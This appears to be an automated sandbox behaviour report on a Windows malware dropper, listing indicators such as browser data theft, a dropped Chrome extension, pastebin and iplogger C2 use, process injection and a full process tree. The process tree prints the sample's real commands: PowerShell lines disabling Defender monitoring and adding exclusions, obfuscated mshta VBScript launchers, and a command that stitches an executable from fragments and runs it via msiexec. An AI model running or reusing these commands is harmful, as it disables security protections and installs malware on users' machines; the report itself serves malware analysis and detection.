| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4680 set thread context of 4736 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe |
| PID 1408 set thread context of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe |
| PID 2892 set thread context of 4004 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343323403090" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1656 -ip 1656
C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp" /SL5="$50114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 612
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp" /SL5="$7027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2276 -ip 2276
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc46a3cc40,0x7ffc46a3cc4c,0x7ffc46a3cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4128 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
